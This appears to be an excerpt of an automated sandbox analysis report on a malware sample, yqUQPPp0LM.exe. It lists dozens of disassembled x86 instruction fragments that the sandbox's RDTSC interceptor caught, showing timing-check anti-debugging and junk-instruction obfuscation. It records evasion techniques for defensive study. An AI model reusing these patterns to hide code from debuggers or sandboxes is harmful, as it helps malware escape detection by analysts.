Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411033 second address: 7411063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007FE9093D6546h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411063 second address: 7411080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411080 second address: 74110C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007FE9093D653Eh 0x00000010 jne 00007FE978DF4B6Dh 0x00000016 pushad 0x00000017 mov di, si 0x0000001a push eax 0x0000001b mov dh, 67h 0x0000001d pop esi 0x0000001e popad 0x0000001f mov edx, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 mov ecx, ebx 0x00000025 movsx ebx, cx 0x00000028 popad 0x00000029 mov eax, dword ptr [esi] 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov eax, 7DB1E20Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74110C8 second address: 741115A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FE908EE7118h 0x0000000c sbb esi, 750AEB58h 0x00000012 jmp 00007FE908EE710Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [edx], eax 0x0000001b pushad 0x0000001c jmp 00007FE908EE7114h 0x00000021 mov cx, DF91h 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+04h] 0x00000029 jmp 00007FE908EE710Ch 0x0000002e mov dword ptr [edx+04h], eax 0x00000031 jmp 00007FE908EE7110h 0x00000036 mov eax, dword ptr [esi+08h] 0x00000039 pushad 0x0000003a mov al, 4Ch 0x0000003c jmp 00007FE908EE7113h 0x00000041 popad 0x00000042 mov dword ptr [edx+08h], eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741115A second address: 741115E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741121C second address: 741122C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741122C second address: 7411338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c jmp 00007FE9093D6546h 0x00000011 mov dword ptr [edx+18h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE9093D653Eh 0x0000001b add ecx, 4E364318h 0x00000021 jmp 00007FE9093D653Bh 0x00000026 popfd 0x00000027 mov eax, 47A34ACFh 0x0000002c popad 0x0000002d mov eax, dword ptr [esi+1Ch] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FE9093D6540h 0x00000037 sub cx, 2D78h 0x0000003c jmp 00007FE9093D653Bh 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FE9093D6548h 0x00000048 sbb ah, FFFFFFD8h 0x0000004b jmp 00007FE9093D653Bh 0x00000050 popfd 0x00000051 popad 0x00000052 mov dword ptr [edx+1Ch], eax 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007FE9093D6544h 0x0000005c or al, 00000038h 0x0000005f jmp 00007FE9093D653Bh 0x00000064 popfd 0x00000065 pushfd 0x00000066 jmp 00007FE9093D6548h 0x0000006b sbb si, 0C98h 0x00000070 jmp 00007FE9093D653Bh 0x00000075 popfd 0x00000076 popad 0x00000077 mov eax, dword ptr [esi+20h] 0x0000007a push eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FE9093D6540h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411338 second address: 741133C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741133C second address: 7411342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411342 second address: 7411348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411348 second address: 741134C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741134C second address: 74113B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e jmp 00007FE908EE7110h 0x00000013 mov eax, dword ptr [esi+24h] 0x00000016 jmp 00007FE908EE7110h 0x0000001b mov dword ptr [edx+24h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FE908EE710Ch 0x00000027 sub si, E2E8h 0x0000002c jmp 00007FE908EE710Bh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74113B4 second address: 74113E0 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, ecx 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+28h] 0x0000000d jmp 00007FE9093D653Eh 0x00000012 mov dword ptr [edx+28h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ebx, 4EE02560h 0x0000001d mov ebx, 6612378Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74113E0 second address: 74113E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74113E6 second address: 74113EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74113EA second address: 7411429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE908EE7115h 0x00000014 sub cl, 00000016h 0x00000017 jmp 00007FE908EE7111h 0x0000001c popfd 0x0000001d mov esi, 6DD1BF87h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411429 second address: 7411468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007FE9093D653Eh 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE9093D6547h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411468 second address: 7411480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411480 second address: 7411576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007FE9093D6547h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 pushad 0x00000016 jmp 00007FE9093D6544h 0x0000001b call 00007FE9093D6542h 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 popad 0x00000024 mov word ptr [edx+32h], ax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FE9093D653Dh 0x0000002f sub cx, 42A6h 0x00000034 jmp 00007FE9093D6541h 0x00000039 popfd 0x0000003a jmp 00007FE9093D6540h 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+34h] 0x00000043 jmp 00007FE9093D6540h 0x00000048 mov dword ptr [edx+34h], eax 0x0000004b pushad 0x0000004c mov al, 3Ah 0x0000004e mov ah, dl 0x00000050 popad 0x00000051 test ecx, 00000700h 0x00000057 pushad 0x00000058 push eax 0x00000059 pushfd 0x0000005a jmp 00007FE9093D6547h 0x0000005f xor eax, 76EE0FEEh 0x00000065 jmp 00007FE9093D6549h 0x0000006a popfd 0x0000006b pop ecx 0x0000006c popad 0x0000006d jne 00007FE978DF46E2h 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7411576 second address: 741159F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE908EE7112h 0x0000000a sub si, 3298h 0x0000000f jmp 00007FE908EE710Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741159F second address: 74115CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+38h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9093D653Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74115CF second address: 74115DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74115DF second address: 74115F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9093D653Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74115F7 second address: 7411661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE7111h 0x00000009 sub cx, BAF6h 0x0000000e jmp 00007FE908EE7111h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 or dword ptr [edx+40h], FFFFFFFFh 0x0000001d jmp 00007FE908EE710Ah 0x00000022 pop esi 0x00000023 pushad 0x00000024 jmp 00007FE908EE710Eh 0x00000029 mov si, 3DE1h 0x0000002d popad 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE908EE7113h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 740066F second address: 7400675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400675 second address: 7400679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7400679 second address: 740067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 740067D second address: 74006C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE908EE710Ah 0x00000010 and ch, FFFFFFC8h 0x00000013 jmp 00007FE908EE710Bh 0x00000018 popfd 0x00000019 movzx eax, dx 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 jmp 00007FE908EE710Bh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE908EE7110h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74006C9 second address: 74006CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74006CD second address: 74006D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A002B second address: 73A0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0031 second address: 73A0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0035 second address: 73A0039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A059B second address: 73A05A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A05A0 second address: 73A060F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE9093D653Dh 0x0000000a sub si, 53F6h 0x0000000f jmp 00007FE9093D6541h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov ebx, esi 0x0000001d mov ch, DDh 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FE9093D653Ch 0x0000002a adc si, 0C48h 0x0000002f jmp 00007FE9093D653Bh 0x00000034 popfd 0x00000035 jmp 00007FE9093D6548h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A09E4 second address: 73A09F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A09F7 second address: 73A0A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE9093D6540h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0A1D second address: 73A0A87 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE908EE7112h 0x00000008 sub ch, FFFFFFC8h 0x0000000b jmp 00007FE908EE710Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FE908EE7116h 0x0000001a mov ebp, esp 0x0000001c jmp 00007FE908EE7110h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE908EE7117h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73A0A87 second address: 73A0A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F09F2 second address: 73F0A1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE908EE710Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F0A1F second address: 73F0AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE9093D6547h 0x00000011 xor ax, 694Eh 0x00000016 jmp 00007FE9093D6549h 0x0000001b popfd 0x0000001c mov edx, esi 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FE9093D653Ah 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 pushad 0x00000029 mov esi, 20620FE3h 0x0000002e movzx ecx, bx 0x00000031 popad 0x00000032 mov cx, bx 0x00000035 popad 0x00000036 pop ebp 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushfd 0x0000003b jmp 00007FE9093D6543h 0x00000040 sbb eax, 7E499CBEh 0x00000046 jmp 00007FE9093D6549h 0x0000004b popfd 0x0000004c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0C9F second address: 73C0CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0CA4 second address: 73C0CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9093D653Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0CBE second address: 73C0CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0CC4 second address: 73C0CFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE9093D6540h 0x00000010 and esp, FFFFFFF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE9093D653Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0CFF second address: 73C0D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D05 second address: 73C0D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D0B second address: 73C0D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D0F second address: 73C0D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D13 second address: 73C0D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 44h 0x0000000b jmp 00007FE908EE7114h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov ecx, 0CFAC11Dh 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE908EE710Fh 0x0000001e xor esi, 20889F8Eh 0x00000024 jmp 00007FE908EE7119h 0x00000029 popfd 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov eax, edx 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D7B second address: 73C0D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D81 second address: 73C0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D87 second address: 73C0D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D8B second address: 73C0D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0D8F second address: 73C0E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a call 00007FE9093D653Ah 0x0000000f mov esi, 18986081h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FE9093D6547h 0x0000001b add si, 47AEh 0x00000020 jmp 00007FE9093D6549h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], esi 0x0000002a jmp 00007FE9093D653Eh 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FE9093D653Eh 0x00000037 or si, 7C58h 0x0000003c jmp 00007FE9093D653Bh 0x00000041 popfd 0x00000042 movzx eax, bx 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FE9093D6547h 0x00000050 xor ecx, 1E179FCEh 0x00000056 jmp 00007FE9093D6549h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0E55 second address: 73C0E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0F8963A9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FE908EE710Bh 0x00000011 mov edi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0E75 second address: 73C0E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0E7B second address: 73C0ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 60D9B2AFh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+24h], 00000000h 0x00000013 pushad 0x00000014 movsx ebx, si 0x00000017 pushfd 0x00000018 jmp 00007FE908EE7118h 0x0000001d or ch, 00000008h 0x00000020 jmp 00007FE908EE710Bh 0x00000025 popfd 0x00000026 popad 0x00000027 lock bts dword ptr [edi], 00000000h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov dx, 6D76h 0x00000033 mov cx, di 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0ECB second address: 73C0F17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE979377A82h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE9093D653Eh 0x00000016 add ecx, 1C3249C8h 0x0000001c jmp 00007FE9093D653Bh 0x00000021 popfd 0x00000022 popad 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0F17 second address: 73C0F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0F1B second address: 73C0F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73C0F21 second address: 73C0F76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7116h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, 7170h 0x00000011 pushfd 0x00000012 jmp 00007FE908EE7119h 0x00000017 sub esi, 1EC652F6h 0x0000001d jmp 00007FE908EE7111h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F0933 second address: 73F0937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F0937 second address: 73F093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 73F093D second address: 73F09AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE9093D653Ah 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FE9093D6540h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 movzx ecx, bx 0x0000001b call 00007FE9093D6543h 0x00000020 pushfd 0x00000021 jmp 00007FE9093D6548h 0x00000026 adc eax, 6A11BF88h 0x0000002c jmp 00007FE9093D653Bh 0x00000031 popfd 0x00000032 pop eax 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
